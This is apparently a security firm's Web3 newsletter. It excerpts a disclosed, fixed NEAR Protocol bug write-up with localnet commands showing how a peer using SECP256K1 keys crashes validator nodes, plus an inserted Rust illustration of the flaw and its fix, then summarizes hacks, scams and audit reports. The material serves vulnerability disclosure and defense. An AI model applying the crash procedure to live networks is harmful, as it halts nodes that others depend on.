Welcome to the Zellic Security Roundup, a monthly security-focused newsletter covering valuable security news and analysis in Web3.
This month will focus on a chain-halting vulnerability discovered by a Zellic Security Researcher in NEAR Protocol, our recently completed audit reports, and the latest news in Web3 security.
Cool Finds at Zellic
Below is a snippet from our blog post “Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR” written by Zellic Security Researcher @farazsth98.
Proof-of-Concept Exploit
When I started writing up a proof of concept to demonstrate this bug in the localnet environment, I found it somewhat surprising that there was no code path that allows a NEAR node to generate SECP256K1 type keys.
This somewhat explains why the two bugs shown above are so simple in nature — there simply wasn’t a way to generate SECP256K1 keys in the localnet environment, and therefore this code path ended up never being tested. All generated keys are hardcoded to be ED25519 keys.
Local Network Setup
I first set up a local network with the following configuration:
One validator node
One full node
In this setup, the validator node would be a legitimate node that is running and continuously producing blocks. The full node would be the malicious node that I patch and introduce into the network.
The end goal is for the malicious full node to connect to the network and immediately crash the validator node.
To do this, I pulled the nearcore repo (found here, commit e0f0da5c3dde29122e956dfd905811890de9a570) and ran make neard-debug -j8 to build a debug version of the node. You can find the final node binary in target/debug/neard. I renamed the binary to neard_legit because I would be rebuilding the binary with my malicious patch applied later on.
I then used the following command to generate a localnet configuration with one validator node and one full node:
$ target/debug/neard_legit --home ./localnet_config localnet -v 1 -n 1
The validator node configuration can be found in ./localnet_config/node0, while the full node can be found in ./localnet_config/node1.
Before continuing, I would need to rebuild the neard binary, except this time with my malicious patches added.
Maliciously Patching the Full Node
The final patch diff file can be found here.
Note that the same .expect() vulnerability also existed in the Signature::sign() function in the same code file. However, this function is only used by the sending peer and thus would not lead to a security impact.
However, I’d still need to patch the vulnerability in the malicious node, as otherwise it would just crash when signing the owned_account.payload.
My patch does a few things:
It patches the .expect() vulnerability in the Signature::sign() and Signature::verify() functions. This allows the malicious node to create SECP256K1 signatures without crashing.
It patches the code used by the neard localnet command to make it generate SECP256K1 keys instead of ED25519 keys.
The patch should apply cleanly to commit e0f0da5c3dde29122e956dfd905811890de9a570.
After this, I rebuilt the neard binary again. I used it to then generate a malicious network configuration. This allowed me to copy over the validator_key.json and node_key.json files of the malicious node into ./localnet_config/node1, which means the malicious full node in my localnet environment will now use SECP256K1 keys:
$ target/debug/neard --home ./localnet_malicious_config localnet -v 1
$ cat localnet_malicious_config/node0/validator_key.json
{
"account_id": "node0",
"public_key": "secp256k1:nUsQNkHfWWPWP5bkF73AN43VXKmztJdcuqL44yKT2GfyezYbWAu9wK8MLLjxPWxjJgeGu2qapnQVnGBZKW4tFcd",
"secret_key": "secp256k1:E7rvMjFtqC1KddPt8pqF1HGBxqbAUJMkP8EXbNAUwokB"
}
$ cp localnet_malicious_config/node0/*key.json localnet_config/node1/
Triggering the Crash
To demonstrate the crash, I first started the legitimate validator node in one terminal:
$ target/debug/neard_legit --home ./localnet_config/node0/ run
I then started my malicious validator node in another terminal. Note that target/debug/neard is the malicious node as it was compiled second. It is also using the SECP256K1 keys that were copied into its configuration directory:
$ target/debug/neard --home localnet_config/node1/ run
Immediately after starting this node, the legitimate validator node crashes with the following snipped stack trace (the logs can be found in ./localnet_config/node0/logs.txt):
thread 'actix-rt|system:0|arbiter:11' panicked at core/crypto/src/signature.rs:557:63:
32 bytes: InvalidMessage
stack backtrace:
0: rust_begin_unwind
at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/std/src/panicking.rs:597:5
1: core::panicking::panic_fmt
at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/panicking.rs:72:14
2: core::result::unwrap_failed
at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/result.rs:1652:5
3: core::result::Result<T,E>::expect
at /rustc/79e9716c980570bfd1f666e3b16ac583f0168962/library/core/src/result.rs:1034:23
4: near_crypto::signature::Signature::verify
at ./core/crypto/src/signature.rs:551:27
5: near_network::network_protocol::AccountKeySignedPayload::verify
at ./chain/network/src/network_protocol/mod.rs:211:15
And there it was — the handshake of death. I could now say with 100% certainty that the vulnerability was real and could be used to crash any node on the network. As an added bonus, if any legitimate nodes come back online while the malicious node is still running, they end up instantly crashing again.
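The panic in the trace above comes from a Result being unwrapped with .expect() inside Signature::verify on data a remote peer controls. The Rust below is an added illustration of that bug class and of an error-propagating fix; it is not nearcore's code and not the fix NEAR shipped. Message, check and accept_peer are stand-ins assumed for the example, and Message::from_slice mimics the 32-byte-or-InvalidMessage behaviour the trace reports.

```rust
// Added illustration, not nearcore's code: an .expect() on peer-controlled
// data turns a malformed handshake into a thread panic; propagating the
// error turns it into one rejected connection.
use std::convert::TryFrom;

#[derive(Debug, PartialEq)]
pub enum Error {
    InvalidMessage,
}

/// Stand-in for secp256k1::Message (assumed shape): exactly 32 bytes, or an
/// InvalidMessage error, which is what the stack trace above reports.
pub struct Message([u8; 32]);

impl Message {
    pub fn from_slice(data: &[u8]) -> Result<Message, Error> {
        <[u8; 32]>::try_from(data)
            .map(Message)
            .map_err(|_| Error::InvalidMessage)
    }
}

/// Placeholder for the real signature check (assumed; always succeeds so the
/// example isolates the parsing step that actually panicked).
fn check(msg: &Message) -> bool {
    msg.0.len() == 32
}

/// Vulnerable shape: the payload length is chosen by the sending peer, so a
/// payload that is not 32 bytes reaches .expect() and unwinds the thread.
pub fn verify_with_expect(data: &[u8]) -> bool {
    let msg = Message::from_slice(data).expect("32 bytes");
    check(&msg)
}

/// Hardened shape: a malformed message is a verification failure, not a panic.
pub fn verify_checked(data: &[u8]) -> bool {
    match Message::from_slice(data) {
        Ok(msg) => check(&msg),
        Err(_) => false,
    }
}

/// What the receiving node should do with a peer whose payload does not
/// verify: drop that one handshake and keep producing blocks.
pub fn accept_peer(payload: &[u8]) -> Result<(), &'static str> {
    if verify_checked(payload) { Ok(()) } else { Err("handshake rejected: bad signed payload") }
}
```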
Zellic Research & Writing
Web3 Ping of Death: Finding and Fixing a Chain-Halting Vulnerability in NEAR
A look into how Zellic identified and helped fix a vulnerability in NEAR Protocol.
Two Vulnerabilities in gnark's Groth16 Proofs
An analysis of two vulnerabilities Zellic discovered that broke zero-knowledge and soundness of gnark’s Groth16 proofs with commitments.
In the News
Research
Following the public disclosure of the two vulnerabilities discovered by Zellic Security Researcher Malte Leip, the gnark team confirmed the fix for both issues and explained the fixes in this thread.
Thomas Roche, a researcher at NinjaLab, discovered a side-channel vulnerability in the cryptographic library of Infineon Technologies, which could lead to an EUCLEAK attack allowing attackers to extract Elliptic Curve Digital Signature Algorithm secret keys and create a clone of the FIDO device.
Pablo Sabbatella interviewed Fredrik Svantes, Security Research Lead at the Ethereum Foundation, to discuss operational security within the blockchain space, the crucial role of incident response, and the importance of transparency in the vulnerability disclosure process.
The Security Frameworks by Security Alliance (SEAL) is “a curated resource for those seeking knowledge in the realm of blockchain security”.
In a GitLab blog post from 2021, the author Chris Moberly covers drive-by attacks, in which malicious code hidden in a website uses your own browser to attack your computer, and the steps you can take to reduce the chance of a drive-by attack happening to you.
“Attacking UNIX Systems via Cups, Part I” is a deep dive into a vulnerability in which “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer)”.
Hacks
Shezmu, a hybrid lending platform, recovered ~$5M of stolen funds following the exploitation of one of its ShezmuUSD stablecoin vaults. After agreeing to the terms, the hacker sent the stolen Dai tokens and the remaining balance in ETH and WETH.
Onyx, a DeFi protocol, was exploited for $3.8M (a combination of virtual USD, Onyxcoin, Wrapped Bitcoin, DAI, and USDT) due to a vulnerability in its NFT-liquidation contract.
Bedrock, a liquid restaking protocol, released a post-mortem report following their $2M exploit stemming from a vulnerability in a uniBTC smart contract.
Crime
The US Department of Justice charged two Russian nationals over a cryptocurrency laundering scheme with transactions totaling ~$1.15B in value from July 12, 2013 to August 10, 2024.
German authorities shut down 47 illegal cryptocurrency exchange services in the country, accusing the operators of enabling large-scale money laundering by neglecting to enforce anti-money laundering regulations.
Legal
The U.S. Department of Treasury announced that it is undertaking actions to disrupt Russian cybercrime services. This coordinated international effort is specifically targeting PM2BTC and Cryptex, Russian virtual currency exchangers, and aims to “counter the ransomware threat and target Russian illicit financial activity”.
Tether participated in a joint operation led by the Dutch Fiscal Information and Investigation Service and the National High Tech Crime Unit by freezing digital assets and wallets linked to suspects.
Gurbir Grewal, the SEC’s Director of Enforcement who focused heavily on addressing noncompliance in the cryptocurrency industry, is stepping down from his position following 21 years spent with the SEC.
Scams
ZachXBT published an investigation into how three malicious individuals stole $243M from a single person in a “highly sophisticated social engineering attack”.
The FBI reported that Americans lost $5.6B in 2023 from crypto fraud scams, a 45% increase from 2022.
Facct, a threat intelligence firm, reported that hackers exploited auto-reply emails from compromised accounts seeking to install the XMRig miner on victims’ devices to mine digital assets.
BaseBros Fi, a DeFi protocol on the Base blockchain, vanished from the internet after stealing its users’ funds through an unaudited smart contract.
Meet Up With Us
We won’t be traveling in October, but if you’d like to schedule a call with our team, reach out to sales@zellic.io!
Recent Zellic Audit Reports
Acctual Batch Payments Audit Report: Acctual developed a smart contract that allows their users to create batch / multisend transactions of native and ERC-20 tokens to pay their crypto bills.
Yeet Audit Report: Yeet is a gamified DeFi protocol in the Berachain ecosystem with no dominant game theoretic strategy.
Saffron Audit Report: Saffron LIDO Fixed Income Vaults provides fixed income from ETH staking.
Chainflip Audit Report: Chainflip is a cross-chain asset-exchange protocol. At its core are two major innovations — fully distributed and permissionless 100-of-150 multi-signature vaults using the FROST signing protocol and a novel and highly capital-efficient JIT (just-in-time) AMM.